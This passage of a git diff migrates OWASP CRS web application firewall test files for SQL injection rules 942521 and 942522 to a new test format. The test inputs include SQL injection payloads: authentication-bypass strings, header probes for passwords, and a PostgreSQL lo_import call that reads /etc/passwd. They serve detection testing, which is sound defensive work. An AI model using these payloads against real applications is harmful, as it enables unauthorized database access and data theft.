text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var='.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'or" + version: HTTP/1.0 + output: + log: + expect_ids: [942521] + - test_id: 19 desc: "Negative test: performance test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'or" - version: HTTP/1.0 - output: - no_log_contains: id "942521" - - test_title: 942521-20 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'or" + version: HTTP/1.0 + output: + log: + no_expect_ids: [942521] + - test_id: 20 desc: "Detect admin%40juice-sh.op'and%20likely%20(id)--" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "admin%2540juice-sh.op%5C%27and%2520likely%2520%28id%29--" - version: HTTP/1.0 - output: - log_contains: id "942521" - - test_title: 942521-21 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "admin%2540juice-sh.op%5C%27and%2520likely%2520%28id%29--" + version: HTTP/1.0 + output: + log: + expect_ids: [942521] + - test_id: 21 desc: "Detects odd number of quotes in request headers" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "1' and starts_with(password) and 'true" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get" - version: HTTP/1.0 - output: - log_contains: id "942521" - - test_title: 942521-22 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "1' and starts_with(password) and 'true" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get" + version: HTTP/1.0 + output: + log: + expect_ids: [942521] + - test_id: 22 desc: "Detects odd number of quotes in request headers" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "1' and lo_import('/etc' || '/pass' || 'wd')::int::bool and 'true" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get" - version: HTTP/1.0 - output: - log_contains: id "942521" - - test_title: 942521-23 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "1' and lo_import('/etc' || '/pass' || 'wd')::int::bool and 'true" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get" + version: HTTP/1.0 + output: + log: + expect_ids: [942521] + - test_id: 23 desc: "Detects odd number of quotes in request headers" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "1' and lo_get(16400)::text::bool and 'true" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get" - version: HTTP/1.0 - output: - log_contains: id "942521" - - test_title: 942521-24 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "1' and lo_get(16400)::text::bool and 'true" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get" + version: HTTP/1.0 + output: + log: + expect_ids: [942521] + - test_id: 24 desc: "Detects odd number of quotes in request headers" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "1'and json_search (json_array(password),0b11000010110110001101100,'t_______________')#" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get" - version: HTTP/1.0 - output: - log_contains: id "942521" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "1'and json_search (json_array(password),0b11000010110110001101100,'t_______________')#" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get" + version: HTTP/1.0 + output: + log: + expect_ids: [942521] diff --git a/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942522.yaml b/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942522.yaml index c692b1f..f81b8e3 100644 --- a/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942522.yaml +++ b/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942522.yaml @@ -2,162 +2,161 @@ meta: author: "terjanq, Franziska Bühler, azurit" description: "Detects basic SQL authentication bypass attempts 4.1/4" - enabled: true - name: 942522.yaml +rule_id: 942522 tests: - - test_title: 942522-1 + - test_id: 1 desc: "Blocks bypass with escaped quotes" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - # \'or'1 - data: "var=%5C'or'1" - version: HTTP/1.0 - output: - log_contains: id "942522" - - test_title: 942522-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + # \'or'1 + data: "var=%5C'or'1" + version: HTTP/1.0 + output: + log: + expect_ids: [942522] + - test_id: 2 desc: "Blocks bypass with escaped quotes" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - # \"or"1 - data: "var=%5C%22or%221" - version: HTTP/1.0 - output: - log_contains: id "942522" - - test_title: 942522-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + # \"or"1 + data: "var=%5C%22or%221" + version: HTTP/1.0 + output: + log: + expect_ids: [942522] + - test_id: 3 desc: "Blocks bypass with escaped quotes" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - # \`or`1 - data: "var=%5C%60or%601" - version: HTTP/1.0 - output: - log_contains: id "942522" - - test_title: 942522-4 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + # \`or`1 + data: "var=%5C%60or%601" + version: HTTP/1.0 + output: + log: + expect_ids: [942522] + - test_id: 4 desc: "Blocks bypass with: \\'and" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=%5C'and" - version: HTTP/1.0 - output: - log_contains: id "942522" - - test_title: 942522-5 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=%5C'and" + version: HTTP/1.0 + output: + log: + expect_ids: [942522] + - test_id: 5 desc: "Negative test: doesn't block normal SQLi" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var='or'1" - version: HTTP/1.0 - output: - no_log_contains: id "942522" - - test_title: 942522-6 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var='or'1" + version: HTTP/1.0 + output: + log: + no_expect_ids: [942522] + - test_id: 6 desc: "Negative test: doesn't block escaped quotes without following (and|or)" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=%5C' foo or" - version: HTTP/1.0 - output: - no_log_contains: id "942522" - - test_title: 942522-7 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=%5C' foo or" + version: HTTP/1.0 + output: + log: + no_expect_ids: [942522] + - test_id: 7 desc: "New line bypass" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=newline%0A%5C' and 1" - version: HTTP/1.0 - output: - log_contains: id "942522" - - test_title: 942522-8 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=newline%0A%5C' and 1" + version: HTTP/1.0 + output: + log: + expect_ids: [942522] + - test_id: 8 desc: "Negative test: Wikipedia article about SQLi" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=Incorrectly%20constructed%20SQL%20statements%0AThis%20form%20of%20injection%20relies%20on%20the%20fact%20that%20SQL%20statements%20consist%20of%20both%20data%20used%20by%20the%20SQL%20statement%20and%20commands%20that%20control%20how%20the%20SQL%20statement%20is%20executed.%20For%20example%2C%20in%20the%20SQL%20statement%20select%20*%20from%20person%20where%20name%20%3D%20'susan'%20and%20age%20%3D%202%20the%20string%20'susan'%20is%20data%20and%20the%20fragment%20and%20age%20%3D%202%20is%20an%20example%20of%20a%20command%20(the%20value%202%20is%20also%20data%20in%20this%20example).%0A%0ASQL%20injection%20occurs%20when%20specially%20crafted%20user%20input%20is%20processed%20by%20the%20receiving%20program%20in%20a%20way%20that%20allows%20the%20input%20to%20exit%20a%20data%20context%20and%20enter%20a%20command%20context.%20This%20allows%20the%20attacker%20to%20alter%20the%20structure%20of%20the%20SQL%20statement%20which%20is%20executed.%0A%0AAs%20a%20simple%20example%2C%20imagine%20that%20the%20data%20'susan'%20in%20the%20above%20statement%20was%20provided%20by%20user%20input.%20The%20user%20entered%20the%20string%20'susan'%20(without%20the%20apostrophes)%20in%20a%20web%20form%20text%20entry%20field%2C%20and%20the%20program%20used%20string%20concatenation%20statements%20to%20form%20the%20above%20SQL%20statement%20from%20the%20three%20fragments%20select%20*%20from%20person%20where%20name%3D'%2C%20the%20user%20input%20of%20'susan'%2C%20and%20'%20and%20age%20%3D%202.%0A%0ANow%20imagine%20that%20instead%20of%20entering%20'susan'%20the%20attacker%20entered%20'%20or%201%3D1%3B%20--.%0A%0AThe%20program%20will%20use%20the%20same%20string%20concatenation%20approach%20with%20the%203%20fragments%20of%20select%20*%20from%20person%20where%20name%3D'%2C%20the%20user%20input%20of%20'%20or%201%3D1%3B%20--%2C%20and%20'%20and%20age%20%3D%202%20and%20construct%20the%20statement%20select%20*%20from%20person%20where%20name%3D''%20or%201%3D1%3B%20--%20and%20age%20%3D%202.%20Many%20databases%20will%20ignore%20the%20text%20after%20the%20'--'%20string%20as%20this%20denotes%20a%20comment.%20The%20structure%20of%20the%20SQL%20command%20is%20now%20select%20*%20from%20person%20where%20name%3D''%20or%201%3D1%3B%20and%20this%20will%20select%20all%20person%20rows%20rather%20than%20just%20those%20named%20'susan'%20whose%20age%20is%202.%20The%20attacker%20has%20managed%20to%20craft%20a%20data%20string%20which%20exits%20the%20data%20context%20and%20entered%20a%20command%20context.%0A%0AA%20more%20complex%20example%20is%20now%20presented.%0A%0AImagine%20a%20program%20creates%20a%20SQL%20statement%20using%20the%20following%20string%20assignment%20command%20%3A%0A%0Avar%20statement%20%3D%20%22SELECT%20*%20FROM%20users%20WHERE%20name%20%3D%20'%22%20%2B%20userName%20%2B%20%22'%22%3B%0A%0AThis%20SQL%20code%20is%20designed%20to%20pull%20up%20the%20records%20of%20the%20specified%20username%20from%20its%20table%20of%20users.%20However%2C%20if%20the%20%22userName%22%20variable%20is%20crafted%20in%20a%20specific%20way%20by%20a%20malicious%20user%2C%20the%20SQL%20statement%20may%20do%20more%20than%20the%20code%20author%20intended.%20For%20example%2C%20setting%20the%20%22userName%22%20variable%20as%3A%0A%0A'%20OR%20'1'%3D'1%0Aor%20using%20comments%20to%20even%20block%20the%20rest%20of%20the%20query%20(there%20are%20three%20types%20of%20SQL%20comments%5B14%5D).%20All%20three%20lines%20have%20a%20space%20at%20the%20end%3A%0A%0A'%20OR%20'1'%3D'1'%20--%0A'%20OR%20'1'%3D'1'%20%7B%0A'%20OR%20'1'%3D'1'%20%2F*%20" - version: HTTP/1.0 - output: - no_log_contains: id "942522" - - test_title: 942522-9 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=Incorrectly%20constructed%20SQL%20statements%0AThis%20form%20of%20injection%20relies%20on%20the%20fact%20that%20SQL%20statements%20consist%20of%20both%20data%20used%20by%20the%20SQL%20statement%20and%20commands%20that%20control%20how%20the%20SQL%20statement%20is%20executed.%20For%20example%2C%20in%20the%20SQL%20statement%20select%20*%20from%20person%20where%20name%20%3D%20'susan'%20and%20age%20%3D%202%20the%20string%20'susan'%20is%20data%20and%20the%20fragment%20and%20age%20%3D%202%20is%20an%20example%20of%20a%20command%20(the%20value%202%20is%20also%20data%20in%20this%20example).%0A%0ASQL%20injection%20occurs%20when%20specially%20crafted%20user%20input%20is%20processed%20by%20the%20receiving%20program%20in%20a%20way%20that%20allows%20the%20input%20to%20exit%20a%20data%20context%20and%20enter%20a%20command%20context.%20This%20allows%20the%20attacker%20to%20alter%20the%20structure%20of%20the%20SQL%20statement%20which%20is%20executed.%0A%0AAs%20a%20simple%20example%2C%20imagine%20that%20the%20data%20'susan'%20in%20the%20above%20statement%20was%20provided%20by%20user%20input.%20The%20user%20entered%20the%20string%20'susan'%20(without%20the%20apostrophes)%20in%20a%20web%20form%20text%20entry%20field%2C%20and%20the%20program%20used%20string%20concatenation%20statements%20to%20form%20the%20above%20SQL%20statement%20from%20the%20three%20fragments%20select%20*%20from%20person%20where%20name%3D'%2C%20the%20user%20input%20of%20'susan'%2C%20and%20'%20and%20age%20%3D%202.%0A%0ANow%20imagine%20that%20instead%20of%20entering%20'susan'%20the%20attacker%20entered%20'%20or%201%3D1%3B%20--.%0A%0AThe%20program%20will%20use%20the%20same%20string%20concatenation%20approach%20with%20the%203%20fragments%20of%20select%20*%20from%20person%20where%20name%3D'%2C%20the%20user%20input%20of%20'%20or%201%3D1%3B%20--%2C%20and%20'%20and%20age%20%3D%202%20and%20construct%20the%20statement%20select%20*%20from%20person%20where%20name%3D''%20or%201%3D1%3B%20--%20and%20age%20%3D%202.%20Many%20databases%20will%20ignore%20the%20text%20after%2